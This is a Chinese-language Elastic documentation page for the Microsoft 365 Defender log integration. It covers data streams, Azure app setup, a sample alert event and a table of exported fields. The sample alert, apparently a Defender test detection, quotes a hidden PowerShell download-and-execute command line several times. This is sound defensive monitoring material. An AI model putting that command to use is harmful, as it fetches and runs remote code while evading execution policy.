M365 Defender 集成

编辑

M365 Defender 集成

编辑

版本

2.17.0 (查看全部)

兼容的 Kibana 版本

8.13.0 或更高版本

支持的 Serverless 项目类型
这是什么?

安全性
可观测性

订阅级别
这是什么?

基本

支持级别
这是什么?

Elastic

概述

编辑

Microsoft 365 Defender 集成允许您监控警报、事件(Microsoft Graph 安全 API)和事件(流式 API)日志。Microsoft 365 Defender 是一套统一的、贯穿攻击前和攻击后的企业防御套件,它可以在端点、身份、电子邮件和应用程序之间本地协调检测、预防、调查和响应,从而提供针对复杂攻击的集成保护。

使用 Microsoft 365 Defender 集成来收集和解析来自 Microsoft Azure 事件中心、Microsoft Graph Security v1.0 REST API 和 Microsoft 365 Defender API 的数据。然后,在 Kibana 中可视化这些数据。

例如,您可以使用此集成中的数据来整合和关联来自多个来源的安全警报。此外,通过查看警报和事件,用户可以在 Microsoft 365 Defender 门户中采取适当的措施。

数据流

编辑

Microsoft 365 Defender 集成收集四种事件类型的日志:警报、事件、事件和日志。

警报:此数据流利用 M365 Defender 流式 API 来收集警报,包括 Microsoft 或合作伙伴安全提供商已识别并标记为需要采取行动的客户租户中的可疑活动。

事件(推荐):此数据流利用 M365 Defender 流式 API 来收集警报、设备、电子邮件、应用程序和身份事件。事件将流式传输到 Azure 事件中心。有关流式 API 公开并由 Elastic 集成支持的支持事件列表,请参阅 Microsoft 的文档此处

事件和警报(推荐):此数据流利用 Microsoft Graph 安全 API 来摄取关联的警报实例集合和相关元数据,这些元数据反映了 M365D 中的攻击故事。此集成支持来自 Microsoft 365 Defender、Microsoft Defender for Endpoint、Microsoft Defender for Office 365、Microsoft Defender for Identity、Microsoft Defender for Cloud Apps 和 Microsoft Purview 数据丢失防护的事件。

日志(已弃用):不建议使用此数据流,因为它会从 Microsoft 计划弃用的 SIEM API 中收集事件。当 Microsoft 弃用 SIEM API 时,将删除此数据流。如果您目前正在使用此数据流,我们建议您迁移到支持 Microsoft Graph Security API 的事件数据流。事件数据流收集与日志数据流相同的数据。有关从 SIEM API 迁移到 Graph Security API 的更多信息,请参阅 Microsoft 的文档

要求

编辑

您需要 Elasticsearch 来存储和搜索您的数据,以及 Kibana 来可视化和管理它。您可以使用我们托管在 Elastic Cloud 上的 Elasticsearch 服务(推荐),或者在您自己的硬件上自行管理 Elastic Stack。

此模块使用了 Microsoft Azure 事件中心用于流式事件,Microsoft Graph Security v1.0 REST API用于事件,以及 Microsoft 365 Defender API用于日志数据流。

对于 事件,在 filebeat Azure 事件中心输入中,分区上的租约和事件流中的检查点等状态在接收器之间使用 Azure 存储容器共享。因此,作为使用此输入的前提条件,用户必须创建或使用现有的存储帐户。

兼容性

编辑
  • 当前集成版本中已支持受支持的 Microsoft 365 Defender 流式事件类型

    序号 资源类型

    1

    AlertEvidence

    2

    AlertInfo

    3

    DeviceEvents

    4

    DeviceFileCertificateInfo

    5

    DeviceFileEvents

    6

    DeviceImageLoadEvents

    7

    DeviceInfo

    8

    DeviceLogonEvents

    9

    DeviceNetworkEvents

    10

    DeviceNetworkInfo

    11

    DeviceProcessEvents

    12

    DeviceRegistryEvents

    13

    EmailAttachmentInfo

    14

    EmailEvents

    15

    EmailPostDeliveryEvents

    16

    EmailUrlInfo

    17

    IdentityLogonEvents

    18

    IdentityQueryEvents

    19

    IdentityDirectoryEvents

    20

    CloudAppEvents

    21

    UrlClickEvent

设置

编辑
要从 Microsoft Azure 事件中心收集数据,请按照以下步骤操作
编辑
要从 Microsoft Graph Security v1.0 REST API 收集数据,请按照以下步骤操作
编辑
  1. 注册新的 Azure 应用程序.
  2. 访问事件 API 所需的权限为 SecurityIncident.Read.All。 请参阅更多详细信息此处
  3. 创建应用程序后,它将生成客户端 ID、客户端密钥和租户 ID 值,这些值是收集警报和事件数据所必需的。
要从 Microsoft 365 Defender REST API 收集数据,请按照以下步骤操作
编辑
  1. 注册新的 Azure 应用程序.
  2. 访问日志 API 所需的权限为 Incident.Read.All
  3. 创建应用程序后,它将生成客户端 ID、客户端密钥和租户 ID 值,这些值是收集日志数据所必需的。

日志参考

编辑
警报
编辑

这是 alert 数据集。

示例

alert 的示例事件如下所示

{
    "@timestamp": "2023-10-20T09:54:07.503Z",
    "agent": {
        "ephemeral_id": "5047ff1c-c1ac-4b5f-aaff-47aee13c110b",
        "id": "54d960cc-1254-43af-8389-292d7627367d",
        "name": "elastic-agent-15120",
        "type": "filebeat",
        "version": "8.14.3"
    },
    "cloud": {
        "account": {
            "id": "3adb963c-8e61-48e8-a06d-6dbb0dacea39"
        }
    },
    "data_stream": {
        "dataset": "m365_defender.alert",
        "namespace": "14786",
        "type": "logs"
    },
    "ecs": {
        "version": "8.11.0"
    },
    "elastic_agent": {
        "id": "54d960cc-1254-43af-8389-292d7627367d",
        "snapshot": false,
        "version": "8.14.3"
    },
    "event": {
        "action": [
            "detected"
        ],
        "agent_id_status": "verified",
        "category": [
            "host",
            "iam",
            "network",
            "process"
        ],
        "created": "2023-10-20T09:53:09.883Z",
        "dataset": "m365_defender.alert",
        "duration": 2478000000,
        "end": "2023-10-20T09:51:41.993Z",
        "id": "daefa1828b-dd4e-405c-8a3b-aa28596830dd_1",
        "ingested": "2024-08-12T16:00:30Z",
        "kind": "alert",
        "original": "{\"actorDisplayName\":null,\"additionalData\":null,\"alertPolicyId\":null,\"alertWebUrl\":\"https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"assignedTo\":null,\"category\":\"Execution\",\"classification\":null,\"comments\":[],\"createdDateTime\":\"2023-10-20T09:53:09.8839373Z\",\"description\":\"A suspicious PowerShell activity was observed on the machine. \\nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.\",\"detectionSource\":\"microsoftDefenderForEndpoint\",\"detectorId\":\"7f1c3609-a3ff-40e2-995b-c01770161d68\",\"determination\":null,\"evidence\":[{\"@odata.type\":\"#microsoft.graph.security.deviceEvidence\",\"azureAdDeviceId\":\"f18bd540-d5e4-46e0-8ddd-3d03a59e4e14\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"defenderAvStatus\":\"notSupported\",\"detailedRoles\":[\"PrimaryDevice\"],\"deviceDnsName\":\"clw555test\",\"firstSeenDateTime\":\"2023-10-20T09:50:17.7383987Z\",\"healthStatus\":\"inactive\",\"ipInterfaces\":[\"192.168.5.65\",\"fe80::cfe4:80b:615c:38fb\",\"127.0.0.1\",\"::1\"],\"loggedOnUsers\":[{\"accountName\":\"CDPUserIS-38411\",\"domainName\":\"AzureAD\"}],\"mdeDeviceId\":\"505d70d89cfa3428f7aac7d2eb3a64c60fd3d843\",\"onboardingStatus\":\"onboarded\",\"osBuild\":22621,\"osPlatform\":\"Windows11\",\"rbacGroupId\":0,\"rbacGroupName\":null,\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"riskScore\":\"high\",\"roles\":[],\"tags\":[],\"verdict\":\"unknown\",\"version\":\"22H2\",\"vmMetadata\":null},{\"@odata.type\":\"#microsoft.graph.security.userEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"userAccount\":{\"accountName\":\"CDPUserIS-38411\",\"azureAdUserId\":null,\"displayName\":null,\"domainName\":\"AzureAD\",\"userPrincipalName\":null,\"userSid\":\"S-1-12-1-1485667349-1150190949-4065799612-2328216759\"},\"verdict\":\"unknown\"},{\"@odata.type\":\"#microsoft.graph.security.urlEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"url\":\"http://127.0.0.1/1.exe\",\"verdict\":\"suspicious\"},{\"@odata.type\":\"#microsoft.graph.security.ipEvidence\",\"countryLetterCode\":null,\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"ipAddress\":\"127.0.0.1\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"verdict\":\"suspicious\"},{\"@odata.type\":\"#microsoft.graph.security.processEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"detectionStatus\":\"detected\",\"imageFile\":{\"fileName\":\"powershell.exe\",\"filePath\":\"C:\\\\\Windows\\\\\System32\\\\\WindowsPowerShell\\\\\v1.0\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":491520,\"issuer\":null,\"sha1\":\"a72c41316307889e43fe8605a0dca4a72e72a011\",\"sha256\":\"d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80\",\"signer\":null},\"mdeDeviceId\":\"505d70d89cfa3428f7aac7d2eb3a64c60fd3d843\",\"parentProcessCreationDateTime\":\"2023-10-20T09:51:19.5064237Z\",\"parentProcessId\":5772,\"parentProcessImageFile\":{\"fileName\":\"cmd.exe\",\"filePath\":\"C:\\\\\Windows\\\\\System32\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":323584,\"issuer\":null,\"sha1\":null,\"sha256\":null,\"signer\":null},\"processCommandLine\":\"powershell.exe  -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\\\\\\\test-WDATP-test\\\\\\\\\\invoice.exe');Start-Process 'C:\\\\\\\\\\test-WDATP-test\\\\\\\\\\invoice.exe'\",\"processCreationDateTime\":\"2023-10-20T09:51:39.4997961Z\",\"processId\":8224,\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"userAccount\":{\"accountName\":\"CDPUserIS-38411\",\"azureAdUserId\":null,\"displayName\":null,\"domainName\":\"AzureAD\",\"userPrincipalName\":null,\"userSid\":\"S-1-12-1-1485667349-1150190949-4065799612-2328216759\"},\"verdict\":\"unknown\"}],\"firstActivityDateTime\":\"2023-10-20T09:51:39.5154802Z\",\"id\":\"daefa1828b-dd4e-405c-8a3b-aa28596830dd_1\",\"incidentId\":\"23\",\"incidentWebUrl\":\"https://security.microsoft.com/incidents/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"lastActivityDateTime\":\"2023-10-20T09:51:41.9939003Z\",\"lastUpdateDateTime\":\"2023-10-20T09:54:07.5033333Z\",\"mitreTechniques\":[\"T1059.001\"],\"productName\":\"Microsoft Defender for Endpoint\",\"providerAlertId\":\"efa1828b-dd4e-405c-8a3b-aa28596830dd_1\",\"recommendedActions\":\"1. Examine the PowerShell command line to understand what commands were executed. Note: the content may need to be decoded if it is Base64-encoded.\\n2. Search the script for more indicators to investigate - for example IP addresses (potential C\\u0026C servers), target computers etc.\\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert.\\n4. Look for the process that invoked this PowerShell run and their origin. Consider submitting any suspect files in the chain for deep analysis for detailed behavior information.\",\"resolvedDateTime\":null,\"serviceSource\":\"microsoftDefenderForEndpoint\",\"severity\":\"medium\",\"status\":\"new\",\"tenantId\":\"3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"threatDisplayName\":null,\"threatFamilyName\":null,\"title\":\"Suspicious PowerShell command line\"}",
        "provider": "microsoftDefenderForEndpoint",
        "severity": 3,
        "start": "2023-10-20T09:51:39.515Z",
        "type": [
            "info"
        ],
        "url": "https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39"
    },
    "host": {
        "id": [
            "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843"
        ],
        "ip": [
            "127.0.0.1"
        ],
        "os": {
            "name": [
                "Windows11"
            ],
            "version": [
                "22H2"
            ]
        }
    },
    "input": {
        "type": "httpjson"
    },
    "m365_defender": {
        "alert": {
            "category": "Execution",
            "created_datetime": "2023-10-20T09:53:09.883Z",
            "description": "A suspicious PowerShell activity was observed on the machine. \nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.",
            "detection_source": "microsoftDefenderForEndpoint",
            "detector_id": "7f1c3609-a3ff-40e2-995b-c01770161d68",
            "evidence": [
                {
                    "azure_ad_device_id": "f18bd540-d5e4-46e0-8ddd-3d03a59e4e14",
                    "created_datetime": "2023-10-20T09:53:10.193Z",
                    "defender_av_status": "notSupported",
                    "detailed_roles": [
                        "PrimaryDevice"
                    ],
                    "device_dns_name": "clw555test",
                    "first_seen_datetime": "2023-10-20T09:50:17.738Z",
                    "health_status": "inactive",
                    "ip_interfaces": [
                        "192.168.5.65",
                        "fe80::cfe4:80b:615c:38fb",
                        "127.0.0.1",
                        "::1"
                    ],
                    "logged_on_users": [
                        {
                            "account_name": "CDPUserIS-38411",
                            "domain_name": "AzureAD"
                        }
                    ],
                    "mde_device_id": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843",
                    "odata_type": "#microsoft.graph.security.deviceEvidence",
                    "onboarding_status": "onboarded",
                    "os_build": "22621",
                    "os_platform": "Windows11",
                    "rbac_group": {
                        "id": "0"
                    },
                    "remediation_status": "none",
                    "risk_score": "high",
                    "verdict": "unknown",
                    "version": "22H2"
                },
                {
                    "created_datetime": "2023-10-20T09:53:10.193Z",
                    "odata_type": "#microsoft.graph.security.userEvidence",
                    "remediation_status": "none",
                    "user_account": {
                        "account_name": "CDPUserIS-38411",
                        "domain_name": "AzureAD",
                        "user_sid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759"
                    },
                    "verdict": "unknown"
                },
                {
                    "created_datetime": "2023-10-20T09:53:10.193Z",
                    "odata_type": "#microsoft.graph.security.urlEvidence",
                    "remediation_status": "none",
                    "url": "http://127.0.0.1/1.exe",
                    "verdict": "suspicious"
                },
                {
                    "created_datetime": "2023-10-20T09:53:10.193Z",
                    "ip_address": "127.0.0.1",
                    "odata_type": "#microsoft.graph.security.ipEvidence",
                    "remediation_status": "none",
                    "verdict": "suspicious"
                },
                {
                    "created_datetime": "2023-10-20T09:53:10.193Z",
                    "detection_status": "detected",
                    "image_file": {
                        "name": "powershell.exe",
                        "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
                        "publisher": "Microsoft Corporation",
                        "sha1": "a72c41316307889e43fe8605a0dca4a72e72a011",
                        "sha256": "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80",
                        "size": 491520
                    },
                    "mde_device_id": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843",
                    "odata_type": "#microsoft.graph.security.processEvidence",
                    "parent_process": {
                        "creation_datetime": "2023-10-20T09:51:19.506Z",
                        "id": 5772,
                        "image_file": {
                            "name": "cmd.exe",
                            "path": "C:\\Windows\\System32",
                            "publisher": "Microsoft Corporation",
                            "size": 323584
                        }
                    },
                    "process": {
                        "command_line": "powershell.exe  -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\\test-WDATP-test\\\\\invoice.exe');Start-Process 'C:\\\\\test-WDATP-test\\\\\invoice.exe'",
                        "creation_datetime": "2023-10-20T09:51:39.499Z",
                        "id": 8224
                    },
                    "remediation_status": "none",
                    "user_account": {
                        "account_name": "CDPUserIS-38411",
                        "domain_name": "AzureAD",
                        "user_sid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759"
                    },
                    "verdict": "unknown"
                }
            ],
            "first_activity_datetime": "2023-10-20T09:51:39.515Z",
            "id": "daefa1828b-dd4e-405c-8a3b-aa28596830dd_1",
            "incident_id": "23",
            "incident_web_url": {
                "domain": "security.microsoft.com",
                "original": "https://security.microsoft.com/incidents/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39",
                "path": "/incidents/23",
                "query": "tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39",
                "scheme": "https"
            },
            "last_activity_datetime": "2023-10-20T09:51:41.993Z",
            "last_update_datetime": "2023-10-20T09:54:07.503Z",
            "mitre_techniques": [
                "T1059.001"
            ],
            "provider_alert_id": "efa1828b-dd4e-405c-8a3b-aa28596830dd_1",
            "recommended_actions": "1. Examine the PowerShell command line to understand what commands were executed. Note: the content may need to be decoded if it is Base64-encoded.\n2. Search the script for more indicators to investigate - for example IP addresses (potential C&C servers), target computers etc.\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert.\n4. Look for the process that invoked this PowerShell run and their origin. Consider submitting any suspect files in the chain for deep analysis for detailed behavior information.",
            "service_source": "microsoftDefenderForEndpoint",
            "severity": "medium",
            "status": "new",
            "tenant_id": "3adb963c-8e61-48e8-a06d-6dbb0dacea39",
            "title": "Suspicious PowerShell command line",
            "web_url": {
                "domain": "security.microsoft.com",
                "original": "https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39",
                "path": "/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1",
                "query": "tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39",
                "scheme": "https"
            }
        }
    },
    "message": "A suspicious PowerShell activity was observed on the machine. \nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.",
    "process": {
        "command_line": [
            "powershell.exe  -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\\test-WDATP-test\\\\\invoice.exe');Start-Process 'C:\\\\\test-WDATP-test\\\\\invoice.exe'"
        ],
        "hash": {
            "sha1": [
                "a72c41316307889e43fe8605a0dca4a72e72a011"
            ],
            "sha256": [
                "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80"
            ]
        },
        "parent": {
            "pid": [
                5772
            ],
            "start": [
                "2023-10-20T09:51:19.506Z"
            ]
        },
        "pid": [
            8224
        ],
        "start": [
            "2023-10-20T09:51:39.499Z"
        ],
        "user": {
            "name": [
                "CDPUserIS-38411"
            ]
        }
    },
    "related": {
        "hash": [
            "a72c41316307889e43fe8605a0dca4a72e72a011",
            "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80"
        ],
        "hosts": [
            "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843",
            "Windows11",
            "22H2",
            "clw555test",
            "AzureAD"
        ],
        "ip": [
            "127.0.0.1"
        ],
        "user": [
            "CDPUserIS-38411",
            "S-1-12-1-1485667349-1150190949-4065799612-2328216759"
        ]
    },
    "tags": [
        "preserve_original_event",
        "preserve_duplicate_custom_fields",
        "forwarded",
        "m365_defender-alert"
    ],
    "threat": {
        "tactic": {
            "name": [
                "Execution"
            ]
        },
        "technique": {
            "subtechnique": {
                "id": [
                    "T1059.001"
                ]
            }
        }
    },
    "user": {
        "domain": [
            "AzureAD"
        ],
        "name": [
            "CDPUserIS-38411"
        ]
    }
}
导出的字段
字段 描述 类型

@timestamp

事件时间戳。

date

data_stream.dataset

数据流数据集。

constant_keyword

data_stream.namespace

数据流命名空间。

constant_keyword

data_stream.type

数据流类型。

constant_keyword

event.dataset

事件数据集。

constant_keyword

event.module

事件模块。

constant_keyword

input.type

filebeat 输入的类型。

keyword

log.offset

日志偏移量。

long

m365_defender.alert.actor_display_name

与此警报关联的攻击者或活动组。

keyword

m365_defender.alert.assigned_to

警报的所有者,如果未分配所有者,则为 null。

keyword

m365_defender.alert.category

警报所属的攻击杀伤链类别。与 MITRE ATT&CK 框架对齐。

keyword

m365_defender.alert.classification

指定警报是否表示真实威胁。可能的值包括:unknown、falsePositive、truePositive、benignPositive、unknownFutureValue。

keyword

m365_defender.alert.comments

安全运营 (SecOps) 团队在警报管理过程中创建的注释数组。

flattened

m365_defender.alert.created_datetime

Microsoft 365 Defender 创建警报的时间。

date

m365_defender.alert.description

描述每个警报的字符串值。

keyword

m365_defender.alert.detection_source

识别重要组件或活动的检测技术或传感器。

keyword

m365_defender.alert.detector_id

触发警报的检测器的 ID。

keyword

m365_defender.alert.determination

指定调查的结果,警报是否表示真实的攻击,如果是,则指定攻击的性质。可能的值包括:unknown、apt、malware、securityPersonnel、securityTesting、unwantedSoftware、other、multiStagedAttack、compromisedUser、phishing、maliciousUserActivity、clean、insufficientData、confirmedUserActivity、lineOfBusinessApplication、unknownFutureValue。

keyword

m365_defender.alert.evidence.antispam_direction

电子邮件相对于您网络的方向。可能的值包括:Inbound、Outbound 或 Intraorg。

keyword

m365_defender.alert.evidence.app_id

应用程序的唯一标识符。

keyword

m365_defender.alert.evidence.attachments_count

电子邮件中附件的数量。

long

m365_defender.alert.evidence.azure_ad_device_id

当设备加入 Azure AD 时,Azure Active Directory (Azure AD) 分配给设备的唯一标识符。

keyword

m365_defender.alert.evidence.cluster_by

群集中电子邮件的群集逻辑。

keyword

m365_defender.alert.evidence.cluster_by_value

用于聚类相似电子邮件的值。

keyword

m365_defender.alert.evidence.created_datetime

创建证据并将其添加到警报的时间。

date

m365_defender.alert.evidence.defender_av_status

Defender 反恶意软件引擎的状态。可能的值包括:notReporting、disabled、notUpdated、updated、unknown、notSupported、unknownFutureValue。

keyword

m365_defender.alert.evidence.delivery_action

电子邮件的送达操作。可能的值包括:Delivered、DeliveredAsSpam、Junked、Blocked 或 Replaced。

keyword

m365_defender.alert.evidence.delivery_location

电子邮件的送达位置。可能的值包括:Inbox、External、JunkFolder、Quarantine、Failed、Dropped、DeletedFolder 或 Forwarded。

keyword

m365_defender.alert.evidence.detailed_roles

与事件关联的用户的详细角色。

keyword

m365_defender.alert.evidence.detection_status

检测的状态。可能的值包括:detected、blocked、prevented、unknownFutureValue。

keyword

m365_defender.alert.evidence.device_dns_name

设备的完全限定域名 (FQDN)。

keyword

m365_defender.alert.evidence.display_name

应用程序的名称。

keyword

m365_defender.alert.evidence.email_count

电子邮件群集中电子邮件的计数。

long

m365_defender.alert.evidence.file_details.issuer

颁发证书的证书颁发机构 (CA)。

keyword

m365_defender.alert.evidence.file_details.name

文件的名称。

keyword

m365_defender.alert.evidence.file_details.odata_type

keyword

m365_defender.alert.evidence.file_details.path

文件实例的文件路径(位置)。

keyword

m365_defender.alert.evidence.file_details.publisher

文件的发布者。

keyword

m365_defender.alert.evidence.file_details.sha1

文件内容的 Sha1 加密哈希值。

keyword

m365_defender.alert.evidence.file_details.sha256

文件内容的 Sha256 加密哈希值。

keyword

m365_defender.alert.evidence.file_details.signer

签名文件的签名者。

keyword

m365_defender.alert.evidence.file_details.size

文件的大小(以字节为单位)。

long

m365_defender.alert.evidence.first_seen_datetime

首次看到设备的日期和时间。

date

m365_defender.alert.evidence.health_status

设备的健康状态。可能的值包括:active(活动)、inactive(非活动)、impairedCommunication(通信受损)、noSensorData(无传感器数据)、noSensorDataImpairedCommunication(无传感器数据且通信受损)、unknown(未知)、unknownFutureValue(未知未来值)。

keyword

m365_defender.alert.evidence.image_file.issuer

颁发证书的证书颁发机构 (CA)。

keyword

m365_defender.alert.evidence.image_file.name

文件的名称。

keyword

m365_defender.alert.evidence.image_file.odata_type

keyword

m365_defender.alert.evidence.image_file.path

文件实例的文件路径(位置)。

keyword

m365_defender.alert.evidence.image_file.publisher

文件的发布者。

keyword

m365_defender.alert.evidence.image_file.sha1

文件内容的 Sha1 加密哈希值。

keyword

m365_defender.alert.evidence.image_file.sha256

文件内容的 Sha256 加密哈希值。

keyword

m365_defender.alert.evidence.image_file.signer

签名文件的签名者。

keyword

m365_defender.alert.evidence.image_file.size

文件的大小(以字节为单位)。

long

m365_defender.alert.evidence.instance_id

软件即服务 (SaaS) 应用程序实例的标识符。

keyword

m365_defender.alert.evidence.instance_name

SaaS 应用程序实例的名称。

keyword

m365_defender.alert.evidence.internet_message_id

由发送电子邮件系统设置的电子邮件的面向公众的标识符。

keyword

m365_defender.alert.evidence.ip_address

IP 地址的值,可以是 V4 地址格式或 V6 地址格式。

ip

m365_defender.alert.evidence.ip_interfaces

与事件相关的 IP 接口。

ip

m365_defender.alert.evidence.language

检测到的电子邮件内容的语言。

keyword

m365_defender.alert.evidence.logged_on_users.account_name

已登录用户的用户帐户名称。

keyword

m365_defender.alert.evidence.logged_on_users.domain_name

已登录用户的用户帐户域。

keyword

m365_defender.alert.evidence.logged_on_users.odata_type

keyword

m365_defender.alert.evidence.mde_device_id

Microsoft Defender for Endpoint 为设备分配的唯一标识符。

keyword

m365_defender.alert.evidence.network_message_id

由 Microsoft 365 生成的电子邮件的唯一标识符。

keyword

m365_defender.alert.evidence.network_message_ids

由 Microsoft 365 生成的群集中电子邮件的唯一标识符。

keyword

m365_defender.alert.evidence.object_id

Azure AD 中应用程序对象的唯一标识符。

keyword

m365_defender.alert.evidence.odata_type

keyword

m365_defender.alert.evidence.onboarding_status

计算机加入 Microsoft Defender for Endpoint 的状态。可能的值包括:insufficientInfo(信息不足)、onboarded(已加入)、canBeOnboarded(可加入)、unsupported(不支持)、unknownFutureValue(未知未来值)。

keyword

m365_defender.alert.evidence.os_build

设备正在运行的操作系统版本号。

keyword

m365_defender.alert.evidence.os_platform

设备正在运行的操作系统平台。

keyword

m365_defender.alert.evidence.p1_sender.display_name

发送者的名称。

keyword

m365_defender.alert.evidence.p1_sender.domain_name

发送者域。

keyword

m365_defender.alert.evidence.p1_sender.email_address

发送者的电子邮件地址。

keyword

m365_defender.alert.evidence.p1_sender.odata_type

keyword

m365_defender.alert.evidence.p2_sender.display_name

发送者的名称。

keyword

m365_defender.alert.evidence.p2_sender.domain_name

发送者域。

keyword

m365_defender.alert.evidence.p2_sender.email_address

发送者的电子邮件地址。

keyword

m365_defender.alert.evidence.p2_sender.odata_type

keyword

m365_defender.alert.evidence.parent_process.creation_datetime

创建进程的父进程的日期和时间。

date

m365_defender.alert.evidence.parent_process.id

生成该进程的父进程的进程 ID (PID)。

long

m365_defender.alert.evidence.parent_process.image_file.issuer

颁发证书的证书颁发机构 (CA)。

keyword

m365_defender.alert.evidence.parent_process.image_file.name

文件的名称。

keyword

m365_defender.alert.evidence.parent_process.image_file.odata_type

keyword

m365_defender.alert.evidence.parent_process.image_file.path

文件实例的文件路径(位置)。

keyword

m365_defender.alert.evidence.parent_process.image_file.publisher

文件的发布者。

keyword

m365_defender.alert.evidence.parent_process.image_file.sha1

文件内容的 Sha1 加密哈希值。

keyword

m365_defender.alert.evidence.parent_process.image_file.sha256

文件内容的 Sha256 加密哈希值。

keyword

m365_defender.alert.evidence.parent_process.image_file.signer

签名文件的签名者。

keyword

m365_defender.alert.evidence.parent_process.image_file.size

文件的大小(以字节为单位)。

long

m365_defender.alert.evidence.primary_address

邮箱的主要电子邮件地址。

keyword

m365_defender.alert.evidence.process.command_line

用于创建新进程的命令行。

keyword

m365_defender.alert.evidence.process.creation_datetime

创建进程的日期和时间。

date

m365_defender.alert.evidence.process.id

新创建进程的进程 ID (PID)。

long

m365_defender.alert.evidence.publisher

应用程序发布者的名称。

keyword

m365_defender.alert.evidence.query

用于标识电子邮件群集的查询。

keyword

m365_defender.alert.evidence.rbac_group.id

基于角色的访问控制 (RBAC) 设备组的 ID。

keyword

m365_defender.alert.evidence.rbac_group.name

RBAC 设备组的名称。

keyword

m365_defender.alert.evidence.received_datetime

接收电子邮件的日期和时间。

date

m365_defender.alert.evidence.recipient_email_address

收件人的电子邮件地址,或通讯组列表展开后的收件人的电子邮件地址。

keyword

m365_defender.alert.evidence.registry_hive

记录的操作所应用的注册表配置单元。

keyword

m365_defender.alert.evidence.registry_key

记录的操作所应用的注册表项。

keyword

m365_defender.alert.evidence.registry_value

记录的操作所应用的注册表值的数据。

keyword

m365_defender.alert.evidence.registry_value_name

记录的操作所应用的注册表值的名称。

keyword

m365_defender.alert.evidence.registry_value_type

记录的操作所应用的注册表值的数据类型,例如二进制或字符串。

keyword

m365_defender.alert.evidence.remediation_status

采取的修正措施的状态。可能的值包括:none(无)、remediated(已修正)、prevented(已阻止)、blocked(已阻止)、notFound(未找到)、active(活动)、pendingApproval(待批准)、declined(已拒绝)、notRemediated(未修正)、running(正在运行)、unknownFutureValue(未知未来值)。

keyword

m365_defender.alert.evidence.remediation_status_details

有关修正状态的详细信息。

keyword

m365_defender.alert.evidence.risk_score

由 Microsoft Defender for Endpoint 评估的风险评分。可能的值包括:none(无)、informational(信息性)、low(低)、medium(中)、high(高)、unknownFutureValue(未知未来值)。

keyword

m365_defender.alert.evidence.roles

证据实体在警报中代表的角色,例如,与攻击者关联的 IP 地址将具有证据角色“攻击者”。

keyword

m365_defender.alert.evidence.saas_app_id

SaaS 应用程序的标识符。

keyword

m365_defender.alert.evidence.security_group_id

安全组的唯一标识符。

keyword

m365_defender.alert.evidence.sender_ip

上次检测到的转发邮件的邮件服务器的 IP 地址。

ip

m365_defender.alert.evidence.subject

电子邮件的主题。

keyword

m365_defender.alert.evidence.tags

与证据实例关联的自定义标记数组,例如表示一组设备、高价值资产等。

keyword

m365_defender.alert.evidence.threat_detection_methods

用于检测电子邮件中发现的恶意软件、网络钓鱼或其他威胁的方法的集合。

keyword

m365_defender.alert.evidence.threats

发现的恶意软件或其他威胁的检测名称集合。

keyword

m365_defender.alert.evidence.type

keyword

